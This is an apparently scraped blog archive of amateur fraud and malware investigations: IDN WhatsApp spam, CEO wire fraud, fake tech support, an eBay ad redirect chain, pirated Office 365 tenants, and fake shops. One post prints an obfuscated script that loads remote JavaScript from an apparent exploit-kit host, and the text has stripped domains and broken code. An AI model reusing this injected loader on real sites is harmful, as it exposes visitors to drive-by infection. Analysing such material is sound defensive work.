Google doesn’t have much about this payment reference. So here is an article to help!

If you have applied to South West Railway / South West Trains for a Delay Repay refund on a delayed journey you will probably see the refund on your bank account as “JOURNEYCALL PINGIT”.

Journeycall are a travel payments refund management company.

Posted in Uncategorized | Leave a comment

My preferred method for deploying Adobe Flash Player on a domain.

I am mainly writing this for my own reference as I always forget the script.
Sadly I also can’t credit the person who wrote this script. I didn’t write it! And I can’t find the source of the script by Googling for keywords within the batch file.
A similar version of the script is here but isn’t as feature rich..

Deploying Adobe Flash is always a pain. Firefox blocks it by default now and Chrome seems very variable – works one day and doesn’t work the next.
Additionally while Adobe do provide an MSI download – it doesn’t actually seem to install when set as a Group Policy Installation item. I’ve always had to fall back to the .exe using the below batch file.

@echo off


SET latestVersion=
SET version=0


echo 64-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck

echo 32-bit...
SET key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Flash Player ActiveX"
goto afteroscheck

echo checking %key% for DisplayVersion
SET emptyTest=reg query %key% /v DisplayVersion

rem FOR /f "tokens=3 delims=	" %%# In (
rem 'reg query %key% /v DisplayVersion^|Find "REG_" 2^>Nul') Do (
rem Set "version=%%#"
rem echo Set version to %%#
rem )
rem echo Version in registry reports as %version%
rem IF %version% == %latestVersion% GOTO LATEST_VERSION

  for /f "delims=" %%i in ('reg query %key% /v DisplayVersion^|Find "REG_"') do (
    rem echo.%%i
    echo.%%i | findstr /C:%latestVersion% 1>nul
    if errorlevel 1 (
      echo not current version installed
      Set "version=notcurrent"
    ) ELSE (
      echo Already Installed

TASKLIST /NH | FIND /I "iexplore.exe"
echo Internet Explorer was detected to be running.  Adobe Flash Player installation cannot continue.

echo Adobe Flash Player for ActiveX not found, installing...

start "FlashAX" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_active_x.exe" -install
start "FlashPlugin" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_plugin.exe" -install
start "FlashChrome" /wait "\\contoso.internal\everyone\Adobe Flash Player\install_flash_player_29_ppapi.exe" -install
echo Completed installation of Adobe Flash Player version %latestVersion% for ActiveX.

echo Version %latestVersion% of Adobe Flash Player for ActiveX is already installed.


Remember to change latestVersion= to the version of Flash you are installing. Also change the path to the 3 installation files further down in the script.
Hope this helps someone!

Posted in Uncategorized | Leave a comment

Rogue adverts redirecting ebay visitors off-site. ( and

ebay gamiss advert page

Today while browsing eBay I was taken off the eBay site several times and onto “”. I did click click or even mouse over any advert.

I’ve seen this happen about 3 or so times in the past year with eBay but today I had time to investigate and trace what is going on.

It looks like eBay are sending visitors to an advertising partner called “” who are in turn then sending the visitor to “”.. who are then sending advert javascript with content referencing “” and “”

ebay request 1

ebay request 2

ebay request 3

ebay request 4

ebay request 5

The most interesting parts of the exchange are…. returning the following Javascript:

They reference something to do with Math Media. An advertising agency or system.

Mathtag then send the following javascript:

<div class="script">
        ! function() {
            var e, t = "",
                n = "5a40ca64fc0c4d14be22ffa8",
                r = {},
                o = {
                    10: "2005374866234899183",
                    9: "[SUBID]",
                    8: "https%3A//",
                    7: "[LOCATION_LAT]",
                    6: "[LOCATION_LONG]",
                    5: "[DEVICEID]"
                a = {
                    10: "2903631",
                    9: "5344163",
                    8: "[CUSTOM3]",
                    7: "[CUSTOM4]",
                    6: "[CUSTOM5]",
                    5: "[CUSTOM6]"
                c = {
                    10: "[APP_NAME]",
                    9: "[IDFA]",
                    8: "[AID]"
            try {
                for (var d = 10; d > 4;) r["z" + d] = o[d], r["c" + d] = a[d], d--;
                for (d = 10; d > 7;) r["a" + d] = c[d], d--;
                var i = m(r);

                function m(e) {
                    var t, n;
                    for (var r in "object" == typeof e && (t = ""), e) e.hasOwnProperty(r) && (t = t + "&" + r + "=" + (n = e[r], encodeURIComponent(n)));
                    return t

                function p() {
                    if ( return;
                    for (var e = window; e.parent;) e = e.parent;
                    return e

                function s() {
                    try {
                        return p().document.location.href
                    } catch (e) {
                        try {
                            return p().location.hostname
                        } catch (e) {
                            return function() {
                                try {
                                    var e = window.parent.location.ancestorOrigins;
                                    if (e && e.length >= 1) return e[e.length - 1]
                                } catch (e) {}

                function l(e) {
                    if ("" !== e.responseText) {
                        var t, n = document.createElement("div");
                        n.innerHTML = "

<div>" + e.responseText + "</div>

", n = n.firstChild, document.body.appendChild(n);
                        var r = document.getElementById("adder-inisder"),
                            o = n.getElementsByTagName("script");
                        if (o.length > 0)
                            for (var a = 0; a < o.length; ++a) {
                        r.parentNode.appendChild(n), r.parentNode.removeChild(r)
                    } else {
                        (t = document.createElement("div")).className = "ad-serve-image", t.innerHTML = '<a>  <img src="" height="250" width="300"> </a>', document.getElementById("adder-inisder").parentNode.appendChild(t);
                        var c = document.getElementById("adder-inisder");

                function u(e) {
                    var t = document.createElement("script");
                    e && (e.text ? t.text = e.text : e.src && (t.src = e.src)), e.parentNode.appendChild(t), e.parentNode.removeChild(e)

                function h() {
                    if (200 !== this.status) {
                        if ("complete" !== document.readyState) var e = setInterval(function() {
                            "complete" === document.readyState && (clearInterval(e), f())
                        }, 140);
                        "complete" === document.readyState ? f() : l(this)
                    } else l(this)

                function f() {
                    try {
                        e = !(window.self ===
                    } catch (t) {
                        e = !0
                    var r = t.concat("/?pid=") + n,
                        o = {};
                    e ? ( = function() {
                        try {
                            return p().document.URL
                        } catch (e) {
                            try {
                                return p().frames[0].document.referrer
                            } catch (e) {}
                    }() || "", = s() || "") : ( = window.location.hostname, = function() {
                        try {
                            for (var e = document.getElementsByTagName("meta"), t = 0; t <span id="mce_SELREST_start" style="overflow:hidden;line-height:0;"></span>< e.length; t++) {
                                var n = e[t];
                                if ("og:url" === return n.getAttribute("content")
                        } catch (e) {}
                    }() || ""), r += m(o), r += i;
                    var a = new XMLHttpRequest;
                    a.onload = h,"GET", r), a.send()
            } catch (e) {

This code looks like it is supposed to be showing the following advert: possibly if the browser doesn’t support JavaScript(?) but it also triggers yet another request to (see the last screenshot) which responds with.

<a href="*600" target="_parent"><img width="725" height="90" src=""/></a>
<img width="725" height="90" src="*600&af=[URL]&cn=[CUSTOM1]&cv=[CUSTOM2]&dp=[CB]" style="display:none;">
<iframe src="" style="display: none"></iframe>
<iframe src="" style="display:none"></iframe>
<iframe src="" style="display:none"></iframe>
<iframe src="" style="display:none"></iframe>

And the deed is done. Something within the iframe for gamiss hijacks the entire page and takes you off ebay. It looks like an attempt to deploy affiliate cookies to people so that when, and if, they visit the websites referenced above and make a purchase – the person behind the junk adverts gets a kickback.

Piss poor vetting and subsequent takedown of rogue adverts. This has been a problem for at least a couple of days at this point. eBay is what I’ve seen people refer to as a “dumpster fire”. Lacking competition and drive to do things right.

Looking into the domain involved more ( it seems that the following person is the owner of the domain:

Name Thevar
Organization Mahesh
Street Address

Phone 919029929719

They also own other similarly named and fishy looking domains:
Posted in Uncategorized | Leave a comment

Suspiciously low cost Office 365 accounts are a bad idea!

I’m going to cut to the chase right at the top here. The person behind this specific Office 365 subscription and setup is: with what appears to be an invalid UK format phone number (4414402325)

While hunting for a low cost way to get Office 2016 I came across ebay sellers and forum posts touting Office 365 accounts for as low as 1$.

In this instance the domains associated with this are:
and the company name associated with the account is “inc”.

It looks like there are at least 662,053 users on the domain(s).. so a lot of fraudulent accounts. If each one sold for $1 there is potential for a pretty decent income for the person breaking the Microsoft tenant terms.

The account I managed to get hold of had the subscription “Office 365 A1 Plus for faculty” assigned to it. This is an educational subscription to which Microsoft do not charge the establishment. They are meant for staff only and are only valid for the period that the staff member works for the establishment.

Software piracy is nothing new.. what is new is software piracy twinned with “Cloud Computing”. Essentially victims are joining the software on their computers and the OS on their mobile devices (tablets, phones etc.) to a cloud administration and delivery service.

ObjectId                             DisplayName UserPrincipalName         UserType
--------                             ----------- -----------------         --------
6feaec4c-a03d-47b8-a91e-91763ca15acf new93193 Member
410a9f71-b35b-498b-9359-66b00f61294e newera12 Member
35484d0b-3728-486a-8c12-32925fcce783 Newloib Member
90195ce8-d191-4405-b794-1f6c2e8f69e7 newo           Member
35cab5e1-a57b-4776-bd66-37b6a14344f7 newton1982 Member
fc37f5ed-f2fa-472c-a6fe-4db7f4a78d0d Newupmm Member
33b1c685-e7fa-48f9-8cc3-6a373b451a78 Newuyru Member

Out of the 662,053 users there appears to be about 28,700 devices registered against the Office 365 Azure AD.

With just a normal “user” account you can list all the devices, find their name, OS version and the last logon time. Some even appear to have joined their entire windows machine to the Azure AD domain.

DESKTOP-524MHQJ     Windows      10.0.16299.0    AzureAd         26/01/2018 13:01:53
LAPTOP-HH8A7UON     Windows      10.0.15063.0    Workplace       30/12/2017 09:29:07
iPhone              iPhone       11.2            Workplace       04/12/2017 04:18:02
DESKTOP-204GR9D     Windows      10.0.16299.0    Workplace       11/01/2018 03:57:02
Redza Harith        iPhone       11.2.5          Workplace       29/01/2018 18:56:19          &amp;lt;span 				data-mce-type="bookmark" 				id="mce_SELREST_start" 				data-mce-style="overflow:hidden;line-height:0" 				style="overflow:hidden;line-height:0" 			&amp;gt;&amp;lt;/span&amp;gt;
stockroom           Windows      10.0.16299.0    Workplace       30/01/2018 19:15:03
DESKTOP-4R1702H     Windows      10.0.15063.0    Workplace       06/12/2017 13:04:42
ExoticNympho        Windows      10.0.15063.0    Workplace       06/12/2017 11:05:53
user-PC             Windows      10.0.16299.0    Workplace       21/01/2018 08:29:24 &amp;lt;span 				data-mce-type="bookmark" 				id="mce_SELREST_start" 				data-mce-style="overflow:hidden;line-height:0" 				style="overflow:hidden;line-height:0" 			&amp;gt;&amp;lt;/span&amp;gt;

All the mailing list group names are visiable to any other user too – but luckily, for most, the members and content are not. There are about 1,600 mailing lists / groups visible on the tenant. A selection of which are below.

ObjectId                             DisplayName                                      Description
--------                             -----------                                      -----------
00319e30-08c1-4f0a-a94a-4615902dba7f BDB Group IT                                     Group IT Document
00630644-ae08-4892-967a-e94ce2443c7e Giesse                                           Giesse
00b53ca7-98fd-4207-8e19-6b5cc0f24d40 CMDB                                             CMDB
00b7dd8b-c55e-42bc-b915-4b03fe333bb7 proba                                            proba
01071288-059e-4650-adf9-ddfc70e7866d Buying house                                     Buying house
0141e0cd-8dd4-4d87-933c-e4060dcf7c07 HASA-MCH-TRAINING                                للاستخدام بتعليم المستمر         

Some people have even joined their oauth and other data sharing devices and apps to it!

AvailableToOtherTenants    : True
DisplayName                : owncloud external1

AvailableToOtherTenants    : True
DisplayName                : IperiusBackup

DisplayName                : PCS
LogoutUrl                  :
DisplayName                : PCS
KeyCredentials             : {class KeyCredential {
                               EndDate: 31/12/2099 12:00:00
                               KeyId: 2eebea6e-2bc0-4a04-938f-ffc4596aa262
                               StartDate: 02/02/2018 08:32:27
                               Type: AsymmetricX509Cert
                               Usage: Verify
                               Value: }}
LogoutUrl                  :

It all looks like a disaster waiting to happen.

Further research to do with the associated domain names…
Also associated with,,, and
Also associated
Also associated with,,,,,,,,,,,, and
Also associated with and


Posted in Uncategorized | 2 Comments

“” CEO / Director wire transfer fraud

A recently registered domain is being used in attempts to defraud companies and organisations out of money using BACS / Bank transfers.
Registrant details are a fictitious company at a real address.

 Derek Mugley

Trading as:
 Mugley Co

Registrant's address:
 Sheffield Road 443
 S41 8LT
 United Kingdom

Relevant dates:
 Registered on: 14-Jan-2018
 Expiry date: 14-Jan-2020
 Last updated: 14-Jan-2018

The scam starts with a contact within a company or organisation being sent an e-mail.. supposedly from the director or CEO of the company. In this instance the scammer failed and guessed, incorrectly, at the e-mail format for the organisation. The address in question doesn’t exist and has never existed. The person they chose to imitate doesn’t even use a computer regularly, let alone email.

director spoof fraud wire transfer email

“Quick question – could you let me know the cut off time for processing same day payments?”

Sender Preference Framework (SPF), in this instance, highlighted the forgery to the recipient.

Headers of the email are as follows:

Received: from ( by ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id
 15.20.428.12 via Frontend Transport; Thu, 18 Jan 2018 11:08:10 +0000
Received: from ([])
	by :WBEOUT: with SMTP
	id c82kezjlTYt7tc82keBm7t; Thu, 18 Jan 2018 04:07:38 -0700
X-SID: c82kezjlTYt7t
Received: (qmail 2879 invoked by uid 99); 18 Jan 2018 11:07:38 -0000
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="utf-8"
User-Agent: Workspace Webmail 6.8.19
Message-ID: <>
From: David REDACTED <>
Reply-To: David REDACTED <>
To: <>
Subject: Morning
Date: Thu, 18 Jan 2018 04:07:36 -0700
MIME-Version: 1.0

It looks like the scammer is using a GoDaddy webmail account that belongs to “” and has an “identity” setup on the webmail to send / spoof the from address as the supposed impersonated director. The reply to address has been set to the newly registered domain with the email “”

The email was submitted to GoDaddy from a Sky Broadband IP address possibly based in Oxfordshire.

The scam would play out as so….

You get an email and the fraudster is counting on the fact that..

-They’ve guessed that the board member’s email address is and you think it is legitimate.

-They hope you don’t notice, when you click reply, that the email address you are sending back to is different.

-They hope you don’t notice that the request / question is very unusual.

If you reply to the initial question about payment they will then send another request similar to: I need you to make a quick wire of £24,730 to cover a payment, I will send you the expenditure details for proper coding later today.

Along with some destination bank details.

They are just attempting to get people to wire X thousands of pounds and by the time (12 hours, 24 hours or more) that the company notices that the payment wasn’t legitimate the scammer is long gone as is the money.

Posted in Uncategorized | Leave a comment

Whatsapp spreading spam “IDN” links ( /

Today I delved into a bit of Whatsapp spam doing the rounds in the UK.


This junk spreads using a Whatsapp message the same or similar to:

“Hey ! Waitrose celebrates its 113th anniversary and giving away FREE gift voucher worth of £250 to everyone ! click here to get yours : http://www.waı  Enjoy .”

The domain involved is an “IDN” (International Domain Name)..  a domain name that can have more than just a-z and 0-9 as letters. They can have international symbols which look very much like normal alphabet letters.
(when these were launched people voiced their concerns about attacks like this.. and here they are).

In this instance the i in waitrose has been replaced with a different international letter.

The domain name that people are actually visiting (but is hidden behind the IDN system) is . The domain is registered via a whois privacy service but there are still some clues as to who is running the spam site.

The website is served from an Amazon AWS host and the DNS infrastructure doesn’t give any clues away.

However the source of the spam site has one unique bit of information: a Google Analytics / Tag Manager code of “UA-96118136-18”. The first part of this code (“UA-96118136”) is used to identify a specific Google Analytics account. The number at the end identifies the website under that account.
This code leads onto several other similar scam domain names! – Another Waitrose domain. – (Delta airlines?) Seen using UA-96118136-23 – Which translates to lidǀ.com (another EU supermarket) seen using UA-96118136-6 (“Lidl célèbre son 42 anniversaire et offre gratuit des chèques-cadeaux d’une valeur de €250 chacun!, Je viens de recevoir le mien, cliquez ici pour obtenir le vôtre : http://www.lidǀ.com/Bon Merci plus tard .”) – Which translates to www.ıĸ seen using UA-96118136-31 – Which translates to www.costcơ.com (International wholesale supermarket) seen using UA-96118136-46 – (Southwest airlines?) Seen using UA-96118136-38 – Which translates to www.asđ (a UK supermarket) seen using UA-96118136-20

The website owner is also quite keen to prevent desktop users from seeing the page. There is some basic javascript to forward any screen resolution above 1000 pixels wide to a 404 page.

When you are using a mobile page you are given a series of supposedly survey questions – none of these question responses are stored anywhere or sent anywhere.

It then asks you to share the page with whatsapp friends – Once you’ve done this 15 times it forwards you to another page. (they don’t verify, just click the button 15 times and back out of sending the message! or (like in my case) don’t have Whatsapp installed so it can’t even attempt to send).

var c = 0;
$(document).ready(function() {
    $("#b1").on('click', function() {
        if (c > 15) {
                href: "",
                target: "_self"
    $("#b2").on('click', function() {
        if (c > 15) window.location = "";
        else window.alert("Share it with friends on WHATSAPP on our anniversary promotion!\n\n You must share to proceed " + c);
}); is a simple single line page that forwards the user to:

The above is a host with an instant referral (CNAME) to “” – a statistics tracking service.
This tracking service then redirects visitors to

The above domain / page is probably the last of the “scammy” pages. The visitor is then redirected to what seems to be a “genuine” “Ocean Cloud” survey and competition:


After bombarding you with demands for your name, date of birth, postal address and then telephone number it asks you tens of questions. Within a few minutes of filling in the survey it sends at least 5 e-mails and one text message with all sorts of spam. The emails have been for casinos and bitcoin.

The text message read

You’ve Won a 
Free Bitcoin System
Claim it NOW here:”

Eventually ends by redirecting you back to (I believe) the scammers controlled page.. whilst also sharing the telephone number with them too:

Who in turn then redirect you to yet another “offer”:

Screenshot_20180105-233258On this page “A brand of SB7 Mobile Ltd.” the terms and conditions hidden at the bottom note that you are signing up to a £4.50 a week SMS service. The page already has your number filled in (from the previous spam survey you just completed).

I presume the scammers get paid an affiliate fee each time they refer someone and their method to generate leads and referral fees is to trick people into sending spam Whatsapp messages.

Thoroughly scammy.

On a side note.. the service shown in the last screenshot is called “”.. This company seem to handle the sign up process to the premium rate reverse charge SMS spam.
They seem to handle sign-ups for the following companies (some are all showing the same postal address): – “SPTwo Ltd” /,, – “SB7 Mobile Ltd” / aka “Alerts 4 U”, – “KPMobTech Ltd” /

Associated domains on the pinchecker servers include “”.. a website that leaks customer telephone numbers! Something that they can be fined for heavily once the EU GDPR comes in to effect.

Update: After just over a week of completing the above I then also got a text:

From: +60441
Free msg: Hi , thanks for completing the telephone survey, now text back YES to confirm your number. Help 03447451791

Part of the same organisation? Or someone they sold their list to who now want me to opt in?

From: +447860064308 / 07860064308
We are contacting you as you could be owed up to £2,442 if you were miss-sold PPI. Reply POST to receive your FREE check or STOP to opt-out, H&H

From: DavidShow
Hi Acrapwaitrose
This new system is
The same one like the one
I’m using:

About a month later I get the following “reminder” sms which reveals another domain name associated with it:

From +88222
FreeMsg: Reminder: U are a member of for £1.50 per alert (max £4.50 per week) until you send STOP to 88222. Help? 03301340181

From +447520660227
We have been trying to contact you re your PPI Claim. We now have details of how much you are due. Reply POST for your pack or END to OptOut

From Maria
Thats the system u ask me about few times:

Another bit of crap to the honeypot number only given to them:

From +447418340104
If you have had a 3 hour+ delay for a flight in the last 6 years reply YES to claim compensation of up to £520 per person or?reply?STOP to opt-out,?Airfair?

Email on 7th Feb at 11:27pm which mentions bitcoin and “” and “”
Followed by an SMS (grr, that late at night!?) at 11:28pm saying:
From Account Dep
Your Bitcoin account has been activated.
Your current balance is: 10,090.18 Pounds.
Claim your Funds Now:<REDACTED&gt;

With this latest spam I’ve finally got the name of a person!

Who is also associated with 85 other domains, most of which look suspicious:

I’ve also had calls to my honeypot number from
020 8077 8840 – These people have called 7 times!
01792 272252 – 4 calls
01473 371629 – 3 calls.

1st March 2018 – Another SMS with another domain:
SMS from “Mark C”
I need you to be my beta tester.
Test my system and get it free:

7th March 2018 – Another SMS with another new domain, registered on 5th March:

SMS from “Robert”
This system change the world
test it and get it free:

10th March 2018 – This time a bit of spam that uses as the landing page.

SMS from “FreeCompare”
TestersKeepers needs you to review and KEEP an £18K Audi A3 for FREE – apply by 31/03/18

Stop? END to 07860020187

12th March 2018 – Another new domain.

SMS from “Danny”
Dear VIP member:
enjoy my new system:

16th March 2018 – another new domain “”

22nd March 2018 – another new bit of spam, this time using a google URL shortened service.. hah, google have disabled the url! No sign in any of these text messages on unsubscribe procedures! (Pretty sure that is against sms spam rules).

SMS from Amanda
IM giving you my new free system.
test it and keep th eprofits:

Posted in Uncategorized | Leave a comment

Scummy fake tech support department on “1-855-676-2448” pretending to be genuine companies support.

These people are posting to youtube videos and many other places pretending to be customer care for genuine companies like AVG, HP, Quicken, Dell, Skype etc.

Needless to say – they are NOT the official support and are likely to incorrectly claim your computer has viruses and needs to be fixed for $150+ etc. Be very wary of any claims that people on the end of this phone number make.

One day I will call, test and record what happens.

scummy support company 1 855 676 2448

They post the US based phone number “1-855-676-2448”


Posted in Uncategorized | Leave a comment

Scummy fake tech support department “1-888-738-4333” and “1-844-711-1008”

Another day browsing the internet and another scummy fake tech support company.
This time trying to be support for almost every service in the world.scummy support company 1 888 738 4333 scummy support company 1 844 711 1008

One day I will call them and post the recording.

Screenshot_20170706-104703 Screenshot_20170707-123418

They don’t post a website but only a US phone number of “1-888-738-4333” and “1-844-711-1008” (or in their formatting “1844-711-1008”. Seems like a huge chunk of their spam posts are to linkedin (Would have thought that they would be far more proactive about removing such spam).

I believe that “1-888-269-0130” is also related to the same people.

Posted in Uncategorized | Leave a comment

“01263 402788” TalkTalk Western Union scammers

It has been a while since I’ve had a report of one of these.. but today there was a victim.

The victim had a call from 01263402788 from someone claiming to be from TalkTalk.
The caller reportedly knew the make and model of the victims TalkTalk router and claimed there has been an ongoing fault that needed repairing.

They talked the victim through loading up TeamViewer and then Ammyy remote admin tools and did the fairly standard tech support scammer tricks of showing event viewer etc.

This is where the scam then pivots. They ask the victim to turn off their tablets and mobile phone (more on this later!) while they scan and fix the problem. They then claimed that the problem had been fixed and as compensation they would refund £200 to the victim/customer.

They then asked the customer to log into their internet banking to check if the refund had come through – all whilst they are connected via remote control to the victims computer. Once the victim has logged in they distract them with conversations or tasks while the scammer transfers £1200 between the victims own accounts (not sure what happens if there isn’t any other account or funds available). They then ask the victim to check the payment has come in.

Victim doesn’t notice that the payment has just been shuffled from their own accounts.. but does comment that “oh, I think you’ve overpaid me! It has come up as £1200, not £200”.

The scammer then goes on the guilt trip claiming he made a mistake and needs the money back as soon as possible otherwise he will lose his job. “The safest way to do this” is to use Western Union.
Victim believes the scammer, somehow didn’t get talked into doing the transaction on the western union online site (which has been the previous method) but instead is given the address of the nearest Western Union shop.

Victim goes – sends back the supposedly overpaid £1,000… scam is complete :(

In this instance the payment request was to a “James Odhiambo” in Kenya.. almost certainly a person who does not really exist and the payment won’t be collected from a WU shop in Kenya.

Posted in Uncategorized | Leave a comment

Suspicious online store “”, “” and “”

Today I came across another suspicious website. This one is advertising on Amazon and other locations:

atlantic electrics advert.png

The website advertised is “”.. upon further inspection the following are red flags:

  • The domain has only been registered since 26th October 2017.. Not even two weeks old at the time of writing.
  • The domain uses “bitcoin-dns hosting”.. bitcoin doesn’t, yet, have much legitimate use.. The person hosting this website is paying by an anonymous payment method.
  • At the time of writing visitors are just being shown a proxied version of the co-op electrical website with one bit of injected code:
<script>var CIfRD = ['h,t,t,p,s,:,/,/,t,r,k,a,j,t,o,o,l,s,.,c,o,m,/,f,l,a,s,h,/,u,p,d,a,t,e'];var lF = CIfRD.join('').replace(/,/g,'');function bGZxEi() { function GN(jrekWr) {var NeSHCgurTf= document.createElement('script');NeSHCgurTf.setAttribute('type', 'text/javascript');NeSHCgurTf.setAttribute('src', jrekWr);if (typeof NeSHCgurTf != 'undefined'){document.getElementsByTagName('body')[0].appendChild(NeSHCgurTf)};}GN(lF)}if (window.addEventListener) {window.addEventListener('load', bGZxEi, false);} else if (window.attachEvent) {window.attachEvent('onload', bGZxEi);} else if (window.onLoad) {window.onload = bGZxEi; } </script> 

In short the code injected into the page requests javascript from:


UPDATE 2017-11-14: This has now changed and is injecting..

 <script src=''></script> 

Right now the above page is just serving a 0 byte file or rejecting the connection entirely.

I will come back to the domain later, but for the moment let’s go back to

The domain is registered with the following interesting information:

The email address “”
The postcode “TS20 9GD”
The email address “” (Associated with the bitcoin-dns account).
This e-mail address has been used to register two other suspicious domains of UK retailers… – a take on the name of “Currys PC World” in the UK. This site seems to just proxies through to eBuyer (another UK online electronics retailer) but also injects the “trkajtools” javascript. – another UK retailer.. this website currently proxies through to “coolshop” (whoever they are) and also injects the “trkajtools” javascript.

“TS20 9GD” – a postcode in the UK format however this postcode does not exist!

An email address associated with many writeups about sites using the Angler exploit kit.
This e-mail address is also associated with

The website is hosted at (“”) and does not seem to host anything else.

So.. going back to “”
This domain was purchased on 17th October 2017 and little intelligence exists about it. The only thing on google was the urlquery report that I ran on the domain earlier in the day. The domain also uses the “”.

The website is hosted at (“”) and also does not seem to host anything else.


A lot of malicious or suspicious websites I find have a clear motive.. ones targeting electronics retail are normally there to steal credit card details or just trick visitors into sending money with no intention of shipping goods.
The atlantic-electrics website is far more ambiguous. It seems like a lot of effort to just infect a few people with an exploit kit whilst serving a page from a genuine retailer.
Possibly they plan to infect people while they investigate available websites and then skim the payment details once they place an order on a genuine website?

Maybe what is currently in place is just temporary and the website flips to being much more malicious at certain times of day or days of the week?

Posted in Uncategorized | Leave a comment